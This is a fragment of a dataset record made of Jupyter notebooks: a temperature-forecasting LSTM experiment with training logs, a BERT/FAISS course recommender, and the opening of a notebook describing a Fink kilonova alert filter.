oneHot = pd.get_dummies(dateConverted[c],prefix=c)\n dateConverted = dateConverted.drop(c,axis=1)\n dateConverted = dateConverted.join(oneHot)\n return dateConverted\n\ndef normalizeTemp(df):\n mms = MinMaxScaler()\n normalized_train_y = mms.fit_transform(df[['Temp']])\n return normalized_train_y\n\ndef massageData(df):\n #Expand Dates\n dateConverted = convertDates(df)\n #Remove certain columns\n dateConverted.pop('Datetime')\n dateConverted.pop('Year')\n\n #Normalize tempatures\n return dateConverted, normalizeTemp(df)\n\ndf = pd.read_csv('/content/daily-min-temperatures.csv')\nnew_dates, new_temp = massageData(df)\n\nnew_temp_df = pd.DataFrame(new_temp,columns=['Temp'])\n\n\n#Add the past into it.\nfor i in range(1,31):\n new_dates['temp_days_minus_'+str(i)] = new_temp_df[['Temp']].shift(i)\n\nnew_dates = new_dates[30:] \nnew_temp = new_temp[30:] \n\ntrain_x, test_x, train_y, test_y = train_test_split(new_dates, new_temp,test_size=0.25)\nmodel = build_model()\nmodel.fit(train_x,train_y,epochs=80,validation_split=0.2,verbose=0)\nmodel.evaluate(test_x,test_y,verbose=1)\n\n'''\nThis still seems to have the same issues with the last one.\nThe only apparent difference is that the second model seems to\nfollow the extremes more closely.\n'''\ndf = pd.read_csv('/content/daily-min-temperatures.csv')\n\nconvertedDates = convertDates(df)[30:]\npredicted1edited = predicted1[30:]\npredicted1edited.index = convertedDates.index = range(0,len(convertedDates))\npredicted2 = pd.DataFrame(model.predict(new_dates),columns=['PredictedTemp2'])\ntemps = predicted1edited.join(predicted2).join(pd.DataFrame(new_temp,columns=['TrueTemp']))\ndatetimeToTemp = convertedDates[['Datetime']].join(temps)\n\n\ndatetimeToTemp.plot('Datetime',figsize=(30,10))\ndatetimeToTemp", "29/29 [==============================] - 0s 1ms/step - loss: 0.0140 - mae: 0.0916 - mse: 0.0140\n" ], [ "'''\nLong-Short Term Memory approach.\n-Use LSTM and concepts from RNN networks.\n'''\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport tensorflow.keras\nfrom sklearn.model_selection import train_test_split\nfrom datetime import datetime\nfrom tensorflow.keras import layers, Sequential\nfrom sklearn.preprocessing import MinMaxScaler \n\n\n\n\n\ndef convertDates(df):\n dateConverted = df[['Date']].apply([\n lambda d : datetime.strptime(d.Date, '%Y-%m-%d')\n ],axis=1).set_axis(['Datetime'],axis=1)\n return dateConverted\n\ndef normalizeTemp(df):\n mms = MinMaxScaler()\n normalized_train_y = mms.fit_transform(df[['Temp']])\n return normalized_train_y\n\ndef massageData(df):\n #Expand Dates\n dateConverted = convertDates(df)\n #Remove certain columns\n dateConverted.pop('Datetime')\n dateConverted.pop('Year')\n\n #Normalize tempatures\n return dateConverted, normalizeTemp(df)\n\ndf = pd.read_csv('/content/daily-min-temperatures.csv')\nnorm_temp = normalizeTemp(df)\n\n\n\n\ndef build_model():\n model = Sequential([\n layers.LSTM(30,input_shape=(30,1)),\n layers.Dense(1),\n ])\n \n model.compile(optimizer='adam',loss='mae',metrics=['mae','mse'])\n\n return model\n\nxs = np.array([\n np.reshape(norm_temp[i-31:i-1],(30,1))\n for i in range(31,len(norm_temp))])\n\nys = np.array([\n norm_temp[i]\n for i in range(31,len(norm_temp))])\nc = [\"temp_\"+str(x) for x in range(1,31)]+[\"true_value\"]\n\ntrain_x, test_x, train_y, test_y = train_test_split(xs,ys,test_size=0.25)\nmodel = build_model()\n\nprint(train_y.shape)\nprint(test_y.shape)\n\nmodel.fit(train_x,train_y,validation_split=0.2,epochs=80)\nmodel.evaluate(test_x,test_y,verbose=1)\n'''\nIt appears RNNs really do work here.\n'''\npredicted3 = pd.DataFrame(model.predict(xs),columns=['PredictedTemp3'])\ntrue = pd.DataFrame(ys,columns=['True'])\nplot_me = datetimeToTemp.join(predicted3)\nplot_me = plot_me[['PredictedTemp1','PredictedTemp2','PredictedTemp3','TrueTemp']]\nplot_me.plot(figsize=(30,20))", "(2714, 1)\n(905, 1)\nEpoch 1/80\n68/68 [==============================] - 1s 16ms/step - loss: 0.1455 - mae: 0.1455 - mse: 0.0395 - val_loss: 0.0852 - val_mae: 0.0852 - val_mse: 0.0125\nEpoch 2/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0876 - mae: 0.0876 - mse: 0.0125 - val_loss: 0.0822 - val_mae: 0.0822 - val_mse: 0.0118\nEpoch 3/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0856 - mae: 0.0856 - mse: 0.0119 - val_loss: 0.0807 - val_mae: 0.0807 - val_mse: 0.0114\nEpoch 4/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0849 - mae: 0.0849 - mse: 0.0117 - val_loss: 0.0804 - val_mae: 0.0804 - val_mse: 0.0114\nEpoch 5/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0848 - mae: 0.0848 - mse: 0.0116 - val_loss: 0.0826 - val_mae: 0.0826 - val_mse: 0.0118\nEpoch 6/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0853 - mae: 0.0853 - mse: 0.0117 - val_loss: 0.0802 - val_mae: 0.0802 - val_mse: 0.0113\nEpoch 7/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0845 - mae: 0.0845 - mse: 0.0115 - val_loss: 0.0794 - val_mae: 0.0794 - val_mse: 0.0111\nEpoch 8/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0845 - mae: 0.0845 - mse: 0.0115 - val_loss: 0.0793 - val_mae: 0.0793 - val_mse: 0.0111\nEpoch 9/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0840 - mae: 0.0840 - mse: 0.0114 - val_loss: 0.0799 - val_mae: 0.0799 - val_mse: 0.0112\nEpoch 10/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0839 - mae: 0.0839 - mse: 0.0115 - val_loss: 0.0789 - val_mae: 0.0789 - val_mse: 0.0110\nEpoch 11/80\n68/68 [==============================] - 1s 13ms/step - loss: 0.0837 - mae: 0.0837 - mse: 0.0113 - val_loss: 0.0824 - val_mae: 0.0824 - val_mse: 0.0118\nEpoch 12/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0838 - mae: 0.0838 - mse: 0.0114 - val_loss: 0.0786 - val_mae: 0.0786 - val_mse: 0.0110\nEpoch 13/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0833 - mae: 0.0833 - mse: 0.0113 - val_loss: 0.0812 - val_mae: 0.0812 - val_mse: 0.0115\nEpoch 14/80\n68/68 [==============================] - 1s 13ms/step - loss: 0.0846 - mae: 0.0846 - mse: 0.0116 - val_loss: 0.0784 - val_mae: 0.0784 - val_mse: 0.0109\nEpoch 15/80\n68/68 [==============================] - 1s 13ms/step - loss: 0.0852 - mae: 0.0852 - mse: 0.0118 - val_loss: 0.0834 - val_mae: 0.0834 - val_mse: 0.0121\nEpoch 16/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0841 - mae: 0.0841 - mse: 0.0115 - val_loss: 0.0788 - val_mae: 0.0788 - val_mse: 0.0110\nEpoch 17/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0833 - mae: 0.0833 - mse: 0.0113 - val_loss: 0.0812 - val_mae: 0.0812 - val_mse: 0.0115\nEpoch 18/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0845 - mae: 0.0845 - mse: 0.0115 - val_loss: 0.0785 - val_mae: 0.0785 - val_mse: 0.0110\nEpoch 19/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0828 - mae: 0.0828 - mse: 0.0111 - val_loss: 0.0801 - val_mae: 0.0801 - val_mse: 0.0113\nEpoch 20/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0835 - mae: 0.0835 - mse: 0.0113 - val_loss: 0.0782 - val_mae: 0.0782 - val_mse: 0.0109\nEpoch 21/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0829 - mae: 0.0829 - mse: 0.0111 - val_loss: 0.0786 - val_mae: 0.0786 - val_mse: 0.0110\nEpoch 22/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0833 - mae: 0.0833 - mse: 0.0112 - val_loss: 0.0806 - val_mae: 0.0806 - val_mse: 0.0115\nEpoch 23/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0833 - mae: 0.0833 - mse: 0.0113 - val_loss: 0.0783 - val_mae: 0.0783 - val_mse: 0.0109\nEpoch 24/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0832 - mae: 0.0832 - mse: 0.0111 - val_loss: 0.0808 - val_mae: 0.0808 - val_mse: 0.0116\nEpoch 25/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0839 - mae: 0.0839 - mse: 0.0114 - val_loss: 0.0827 - val_mae: 0.0827 - val_mse: 0.0120\nEpoch 26/80\n68/68 [==============================] - 1s 15ms/step - loss: 0.0841 - mae: 0.0841 - mse: 0.0115 - val_loss: 0.0810 - val_mae: 0.0810 - val_mse: 0.0115\nEpoch 27/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0842 - mae: 0.0842 - mse: 0.0115 - val_loss: 0.0797 - val_mae: 0.0797 - val_mse: 0.0112\nEpoch 28/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0835 - mae: 0.0835 - mse: 0.0112 - val_loss: 0.0784 - val_mae: 0.0784 - val_mse: 0.0110\nEpoch 29/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0839 - mae: 0.0839 - mse: 0.0115 - val_loss: 0.0799 - val_mae: 0.0799 - val_mse: 0.0114\nEpoch 30/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0831 - mae: 0.0831 - mse: 0.0112 - val_loss: 0.0786 - val_mae: 0.0786 - val_mse: 0.0110\nEpoch 31/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0836 - mae: 0.0836 - mse: 0.0112 - val_loss: 0.0800 - val_mae: 0.0800 - val_mse: 0.0113\nEpoch 32/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0834 - mae: 0.0834 - mse: 0.0113 - val_loss: 0.0814 - val_mae: 0.0814 - val_mse: 0.0118\nEpoch 33/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0839 - mae: 0.0839 - mse: 0.0114 - val_loss: 0.0783 - val_mae: 0.0783 - val_mse: 0.0110\nEpoch 34/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0833 - mae: 0.0833 - mse: 0.0113 - val_loss: 0.0816 - val_mae: 0.0816 - val_mse: 0.0116\nEpoch 35/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0833 - mae: 0.0833 - mse: 0.0112 - val_loss: 0.0784 - val_mae: 0.0784 - val_mse: 0.0110\nEpoch 36/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0836 - mae: 0.0836 - mse: 0.0113 - val_loss: 0.0817 - val_mae: 0.0817 - val_mse: 0.0118\nEpoch 37/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0828 - mae: 0.0828 - mse: 0.0111 - val_loss: 0.0798 - val_mae: 0.0798 - val_mse: 0.0113\nEpoch 38/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0834 - mae: 0.0834 - mse: 0.0112 - val_loss: 0.0782 - val_mae: 0.0782 - val_mse: 0.0110\nEpoch 39/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0824 - mae: 0.0824 - mse: 0.0110 - val_loss: 0.0792 - val_mae: 0.0792 - val_mse: 0.0111\nEpoch 40/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0828 - mae: 0.0828 - mse: 0.0111 - val_loss: 0.0783 - val_mae: 0.0783 - val_mse: 0.0110\nEpoch 41/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0824 - mae: 0.0824 - mse: 0.0110 - val_loss: 0.0788 - val_mae: 0.0788 - val_mse: 0.0111\nEpoch 42/80\n68/68 [==============================] - 1s 13ms/step - loss: 0.0835 - mae: 0.0835 - mse: 0.0113 - val_loss: 0.0810 - val_mae: 0.0810 - val_mse: 0.0116\nEpoch 43/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0827 - mae: 0.0827 - mse: 0.0111 - val_loss: 0.0784 - val_mae: 0.0784 - val_mse: 0.0109\nEpoch 44/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0827 - mae: 0.0827 - mse: 0.0111 - val_loss: 0.0782 - val_mae: 0.0782 - val_mse: 0.0109\nEpoch 45/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0825 - mae: 0.0825 - mse: 0.0110 - val_loss: 0.0781 - val_mae: 0.0781 - val_mse: 0.0109\nEpoch 46/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0829 - mae: 0.0829 - mse: 0.0111 - val_loss: 0.0787 - val_mae: 0.0787 - val_mse: 0.0110\nEpoch 47/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0828 - mae: 0.0828 - mse: 0.0112 - val_loss: 0.0841 - val_mae: 0.0841 - val_mse: 0.0120\nEpoch 48/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0828 - mae: 0.0828 - mse: 0.0112 - val_loss: 0.0787 - val_mae: 0.0787 - val_mse: 0.0110\nEpoch 49/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0828 - mae: 0.0828 - mse: 0.0111 - val_loss: 0.0804 - val_mae: 0.0804 - val_mse: 0.0116\nEpoch 50/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0826 - mae: 0.0826 - mse: 0.0111 - val_loss: 0.0782 - val_mae: 0.0782 - val_mse: 0.0110\nEpoch 51/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0828 - mae: 0.0828 - mse: 0.0112 - val_loss: 0.0785 - val_mae: 0.0785 - val_mse: 0.0110\nEpoch 52/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0822 - mae: 0.0822 - mse: 0.0110 - val_loss: 0.0799 - val_mae: 0.0799 - val_mse: 0.0114\nEpoch 53/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0825 - mae: 0.0825 - mse: 0.0110 - val_loss: 0.0780 - val_mae: 0.0780 - val_mse: 0.0109\nEpoch 54/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0829 - mae: 0.0829 - mse: 0.0112 - val_loss: 0.0778 - val_mae: 0.0778 - val_mse: 0.0109\nEpoch 55/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0828 - mae: 0.0828 - mse: 0.0111 - val_loss: 0.0795 - val_mae: 0.0795 - val_mse: 0.0113\nEpoch 56/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0823 - mae: 0.0823 - mse: 0.0110 - val_loss: 0.0779 - val_mae: 0.0779 - val_mse: 0.0109\nEpoch 57/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0825 - mae: 0.0825 - mse: 0.0111 - val_loss: 0.0777 - val_mae: 0.0777 - val_mse: 0.0109\nEpoch 58/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0827 - mae: 0.0827 - mse: 0.0111 - val_loss: 0.0797 - val_mae: 0.0797 - val_mse: 0.0111\nEpoch 59/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0825 - mae: 0.0825 - mse: 0.0111 - val_loss: 0.0778 - val_mae: 0.0778 - val_mse: 0.0109\nEpoch 60/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0824 - mae: 0.0824 - mse: 0.0111 - val_loss: 0.0782 - val_mae: 0.0782 - val_mse: 0.0109\nEpoch 61/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0824 - mae: 0.0824 - mse: 0.0110 - val_loss: 0.0783 - val_mae: 0.0783 - val_mse: 0.0109\nEpoch 62/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0824 - mae: 0.0824 - mse: 0.0110 - val_loss: 0.0800 - val_mae: 0.0800 - val_mse: 0.0115\nEpoch 63/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0832 - mae: 0.0832 - mse: 0.0112 - val_loss: 0.0798 - val_mae: 0.0798 - val_mse: 0.0112\nEpoch 64/80\n68/68 [==============================] - 1s 13ms/step - loss: 0.0824 - mae: 0.0824 - mse: 0.0110 - val_loss: 0.0786 - val_mae: 0.0786 - val_mse: 0.0110\nEpoch 65/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0827 - mae: 0.0827 - mse: 0.0110 - val_loss: 0.0779 - val_mae: 0.0779 - val_mse: 0.0108\nEpoch 66/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0823 - mae: 0.0823 - mse: 0.0110 - val_loss: 0.0783 - val_mae: 0.0783 - val_mse: 0.0109\nEpoch 67/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0825 - mae: 0.0825 - mse: 0.0110 - val_loss: 0.0783 - val_mae: 0.0783 - val_mse: 0.0110\nEpoch 68/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0830 - mae: 0.0830 - mse: 0.0113 - val_loss: 0.0792 - val_mae: 0.0792 - val_mse: 0.0111\nEpoch 69/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0824 - mae: 0.0824 - mse: 0.0110 - val_loss: 0.0798 - val_mae: 0.0798 - val_mse: 0.0114\nEpoch 70/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0823 - mae: 0.0823 - mse: 0.0110 - val_loss: 0.0780 - val_mae: 0.0780 - val_mse: 0.0109\nEpoch 71/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0819 - mae: 0.0819 - mse: 0.0110 - val_loss: 0.0809 - val_mae: 0.0809 - val_mse: 0.0114\nEpoch 72/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0824 - mae: 0.0824 - mse: 0.0110 - val_loss: 0.0787 - val_mae: 0.0787 - val_mse: 0.0111\nEpoch 73/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0822 - mae: 0.0822 - mse: 0.0110 - val_loss: 0.0785 - val_mae: 0.0785 - val_mse: 0.0109\nEpoch 74/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0821 - mae: 0.0821 - mse: 0.0110 - val_loss: 0.0787 - val_mae: 0.0787 - val_mse: 0.0109\nEpoch 75/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0825 - mae: 0.0825 - mse: 0.0111 - val_loss: 0.0777 - val_mae: 0.0777 - val_mse: 0.0108\nEpoch 76/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0821 - mae: 0.0821 - mse: 0.0109 - val_loss: 0.0783 - val_mae: 0.0783 - val_mse: 0.0109\nEpoch 77/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0826 - mae: 0.0826 - mse: 0.0111 - val_loss: 0.0802 - val_mae: 0.0802 - val_mse: 0.0115\nEpoch 78/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0823 - mae: 0.0823 - mse: 0.0111 - val_loss: 0.0779 - val_mae: 0.0779 - val_mse: 0.0109\nEpoch 79/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0823 - mae: 0.0823 - mse: 0.0110 - val_loss: 0.0781 - val_mae: 0.0781 - val_mse: 0.0109\nEpoch 80/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0822 - mae: 0.0822 - mse: 0.0110 - val_loss: 0.0776 - val_mae: 0.0776 - val_mse: 0.0108\n29/29 [==============================] - 0s 3ms/step - loss: 0.0856 - mae: 0.0856 - mse: 0.0121\n" ], [ "err = plot_me.apply([\n lambda a : abs(a.PredictedTemp1 - a.TrueTemp),\n lambda a : abs(a.PredictedTemp2 - a.TrueTemp),\n lambda a : abs(a.PredictedTemp3 - a.TrueTemp)\n],axis=1).set_axis(['Err1','Err2','Err3'],axis=1)\n#cumulative error comparison.\nerr.rolling(99999,min_periods=1).sum().plot(figsize=(30,10))", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code" ] ]
cb207e201aec0b44973869021f4c31e7220385a8
26,898
ipynb
Jupyter Notebook
Exploration/deep_learning_content_based_exploration.ipynb
beileihe/697-Capstone
00d4f48ad1fd380f55462af56acafaf88a75dfc7
[ "CC0-1.0" ]
null
null
null
Exploration/deep_learning_content_based_exploration.ipynb
beileihe/697-Capstone
00d4f48ad1fd380f55462af56acafaf88a75dfc7
[ "CC0-1.0" ]
null
null
null
Exploration/deep_learning_content_based_exploration.ipynb
beileihe/697-Capstone
00d4f48ad1fd380f55462af56acafaf88a75dfc7
[ "CC0-1.0" ]
null
null
null
37.410292
401
0.463046
[ [ [ "## This notebook:\n- Try deep learning method on content based filtering\n", "_____no_output_____" ], [ "----------------------\n### 1. Read files into dataframe\n\n### 2. concat_prepare(f_df, w_df)\n- Concat f_21, w_21\n\n### 3. store_model(df) - only once for a new dataframe\n- Train a SentenceTransformer model\n- Save embedder, embeddings, and corpus\n\n### 4. Read the stored embedder, embeddings, and corpus\n\n### 5. dl_content(df, embeddings, corpus, embedder, course_title, k = 10, filter_level = 'subject', semester = 'fall', lsa = None)\n- input\n - df: dataset\n - embeddings, corpus, embedder: stored embeddings, stored corpus, stored embedder\n - course_title: input course title\n - k: number of recommendation\n - filter_lever, semester, lsa\n- output\n - recommended courses in df", "_____no_output_____" ] ], [ [ "import pandas as pd\nimport numpy as np\nimport pickle\nimport sklearn\nimport faiss\nimport spacy\nfrom sentence_transformers import SentenceTransformer\nimport scipy.spatial", "_____no_output_____" ], [ "online = pd.read_csv('assets/original/2021-10-19-MichiganOnline-courses.csv')\nf_21 = pd.read_csv('assets/f_21_merge.csv')\nw_22 = pd.read_csv('assets/w_22_merge.csv')", "_____no_output_____" ], [ "def concat_prepare(f_df, w_df):\n f_df['semester'] = 'fall'\n w_df['semester'] = 'winter'\n \n # Concat\n df = pd.concat([f_df, w_df])\n \n # Clean\n df = df.fillna('').drop_duplicates(subset=['course']).reset_index().drop(columns='index')\n\n # Remove description with no information\n df['description'].replace('(Hybrid, Synchronous)', '', inplace = True)\n \n # Merge all the text data\n df['text'] = df['Subject'] + ' ' \\\n + df['Course Title'] + ' ' \\\n + df['sub_title'] +' '\\\n + df['description']\n \n return df\n\nfw = concat_prepare(f_21, w_22)\n", "_____no_output_____" ], [ "def store_model(df):\n corpus = df['text'].tolist()\n embedder = SentenceTransformer('bert-base-nli-mean-tokens')\n corpus_embeddings = embedder.encode(corpus)\n with open('corpus_embeddings.pkl', \"wb\") as fOut:\n pickle.dump({'corpus': corpus, 'embeddings': corpus_embeddings}, fOut, protocol=pickle.HIGHEST_PROTOCOL)\n with open('embedder.pkl', \"wb\") as fOut:\n pickle.dump(embedder, fOut, protocol=pickle.HIGHEST_PROTOCOL)\n#store_model(fw)", "_____no_output_____" ] ], [ [ "## Bert Sentence Transformer ", "_____no_output_____" ] ], [ [ "%%time\n\n#Load sentences & embeddings from disc\nwith open('corpus_embeddings.pkl', \"rb\") as fIn:\n stored_data = pickle.load(fIn)\n stored_corpus = stored_data['corpus']\n stored_embeddings = stored_data['embeddings']\n \nwith open('embedder.pkl', \"rb\") as fIn:\n stored_embedder = pickle.load(fIn)", "CPU times: user 293 ms, sys: 770 ms, total: 1.06 s\nWall time: 3.09 s\n" ], [ "len(stored_corpus), len(fw['text'].to_list())", "_____no_output_____" ] ], [ [ "## Deep learning content based filtering", "_____no_output_____" ] ], [ [ "def dl_content(df, embeddings, corpus, embedder, course_title, k = 10, filter_level = 'subject', semester = 'fall', lsa = None):\n # df: dataset\n # embeddings: stored_embeddings\n # corpus: stored_corpus or df['text'].tolist() -- should be the same\n # embedder: stored_embedder\n # course_title = input course title\n # k = number of recommendation\n # filter_level = 'subject', semester = 'fall', lsa = None\n \n \n # If the len of corpus doesn't match the len of input df text, can't process the rec sys properly. \n if len(corpus) != len(df['text']):\n print('Stored corpus and the text of the input dataset are different.')\n return None\n \n else:\n input_ag = df.loc[df['course'] == course_title, 'Acad Group'].unique()\n input_sub = df.loc[df['course'] == course_title, 'Subject'].unique()\n input_course = df.loc[df['course'] == course_title, 'Course Title'].unique()\n input_subtitle = df.loc[df['course'] == course_title, 'sub_title'].unique()\n input_des = df.loc[df['course'] == course_title, 'description'].unique()\n \n query = [' '.join(input_sub + input_course + input_subtitle + input_des)]\n \n if len(query[0]) == 0:\n print('No text information was provided for the recommender system')\n return None\n \n\n d = 768\n index = faiss.IndexFlatL2(d)\n\n index.add(np.stack(embeddings, axis=0))\n\n query_embedding = embedder.encode(query)\n D, I = index.search(query_embedding, k) # actual search\n\n\n distances, indices = index.search(np.asarray(query_embedding).reshape(1,768),k)\n\n #print(\"Query:\", query)\n\n rec_df = df.iloc[indices[0],:]\n \n \n # Filter the df\n \n # Filter df with semester \n if semester in ['fall', 'winter']:\n df = df[df['semester'] == semester]\n else:\n pass\n \n # Filter df with acad_group\n if filter_level == 'academic_group':\n rec_df = rec_df[rec_df['Acad Group'].isin(input_ag)] \n elif filter_level == 'subject':\n rec_df = rec_df[(rec_df['Subject'].isin(input_sub)) | (rec_df['Course Title'].isin(input_course))]\n else:\n pass\n\n req_dis = list(rec_df['requirements_distribution'].unique())\n\n # Filter the df with lsa\n if lsa in req_dis:\n rec_df = rec_df[rec_df['requirements_distribution'] == lsa]\n else:\n # Give error message or no df\n pass\n \n return rec_df[:k]", "_____no_output_____" ], [ "%%time\ndl_content(fw, stored_embeddings, stored_corpus, stored_embedder, 'EECS 587', k = 10, filter_level = None, semester = 'fall', lsa = 'BS')\n", "Query: ['Electrical Engineering And Computer Science (EECS) Open SectionsParallel ComputingThe development of programs for parallel computers. Basic concepts such as speedup, load balancing, latency, system taxonomies. Design of algorithms for idealized models. Programming on parallel systems such as shared or distributed memory machines, networks. Grid computing. Performance analysis.']\nCPU times: user 621 ms, sys: 880 ms, total: 1.5 s\nWall time: 2.72 s\n" ], [ "import gensim\nimport gensim.corpora as corpora\nfrom gensim.utils import simple_preprocess\nfrom gensim.models import CoherenceModel\nfrom gensim.models.ldamulticore import LdaMulticore\n\ncourses = fw['course'].unique()\n\ndef calc_topic_coherence(df):\n def gen_words(texts):\n final = []\n for text in texts:\n new = gensim.utils.simple_preprocess(text, deacc=True)\n final.append(new)\n return (final)\n \n texts = gen_words(df['description'])\n \n num_topics = 1\n id2word = corpora.Dictionary(texts)\n corpus = [id2word.doc2bow(text) for text in texts]\n \n try:\n model = LdaMulticore(corpus=corpus,id2word = id2word, num_topics = num_topics, alpha=.1, eta=0.1, random_state = 42)\n #print('Model created')\n coherencemodel = CoherenceModel(model = model, texts = texts, dictionary = id2word, coherence = 'c_v')\n #print(\"Topic coherence: \",coherencemodel.get_coherence())\n coherence_value = coherencemodel.get_coherence()\n except:\n coherence_value = None\n return coherence_value\n\ndef coh(func):\n coh_val = []\n i = 0\n while i <100:\n input_course = np.random.choice(courses, 1)[0]\n rec_df = func(fw, stored_embeddings, stored_corpus, stored_embedder, input_course, k = 10, filter_level = None, semester = '', lsa = '')\n rec_df = rec_df.append(fw[fw['course'] == input_course])\n rec_df['description'] = rec_df['description'].fillna('').astype(str)\n val = calc_topic_coherence(rec_df)\n if val != None:\n coh_val.append(val)\n i+=1\n\n avg_coh_sk = np.average(coh_val)\n return avg_coh_sk", "_____no_output_____" ], [ "%%time\ndl_coh = coh(dl_content)", "CPU times: user 2min 39s, sys: 26.1 s, total: 3min 5s\nWall time: 7min 44s\n" ], [ "dl_coh", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ] ]
cb20908449b871bb1155cbf59f91b1799f1d8f3b
174,121
ipynb
Jupyter Notebook
KN-Mangrove_filter.ipynb
JulienPeloton/fink_grandma_kn
eb1a07a35089a54a43d6bd45a185c1d5cabf60c8
[ "Apache-2.0" ]
null
null
null
KN-Mangrove_filter.ipynb
JulienPeloton/fink_grandma_kn
eb1a07a35089a54a43d6bd45a185c1d5cabf60c8
[ "Apache-2.0" ]
null
null
null
KN-Mangrove_filter.ipynb
JulienPeloton/fink_grandma_kn
eb1a07a35089a54a43d6bd45a185c1d5cabf60c8
[ "Apache-2.0" ]
null
null
null
228.805519
28,284
0.907007
[ [ [ "# GRANDMA/Kilonova-catcher --- KN-Mangrove\n\nThe purpose of this notebook is to inspect the ZTF alerts that were selected by the Fink KN-Mangrove filter as potential Kilonova candidates in the period 2021/04/01 to 2021/08/31, and forwarded to the GRANDMA/Kilonova-catcher project for follow-up observations.\n\nWith the other filter (KN-LC), we need at least two days to identify a candidate. It may seem like a short amount of time, but if the object is a kilonova, it will already be fading or even too faint to be observed. The second filter aims to tackle younger detections. An alert will be considered as a candidate if, on top of the other cuts, one can identify a suitable host and the resulting absolute magnitude is compatible with the kilonovae models.\nTo identify possible hosts, we used the MANGROVE catalog [1]. It is an inventory of 800,000 galaxies. At this point, we are only interested in their position in the sky: right ascension, declination, and luminosity distance. We only considered the galaxies in a 230 Mpc range, as it is the current observation range of the gravitational waves interferometers.\n\nThis filter uses the following cuts:\n- Point-like object: the star/galaxy extractor score must be above 0.4. This could be justified by saying that the alert should be a point-like object. Actually, few objects score below 0.4 given the current implementation, and objects that do are most likely boguses.\n- Non-artefact: the deep real/bogus score must be above 0.5.\n- Object non referenced in SIMBAD catalog (galactic ones).\n- Young detection: less than 6 hours.\n- Galaxy association: The alert should within 10 kpc of a galaxy from the Mangrove catalog.\n- Absolute magnitude: the absolute magnitude of the alert should be −16 ± 1.\n\nAccording to [2], we expect a kilonova event to display an absolute magnitude of −16 ± 1. We don’t know the distance of the alerts in general, so we will compute the absolute magnitude of an alert as if it were in a given galaxy. This threshold is given in the band g but it was implemented and band g and r without distinction. This hypothesis is due to the lack of observations.\n\nThe galaxy association method is also not perfect: it can lead to the mis-association of an event that is in the foreground or the background of a galaxy. But this is necessary as the luminosity distance between the earth and the alert is usually 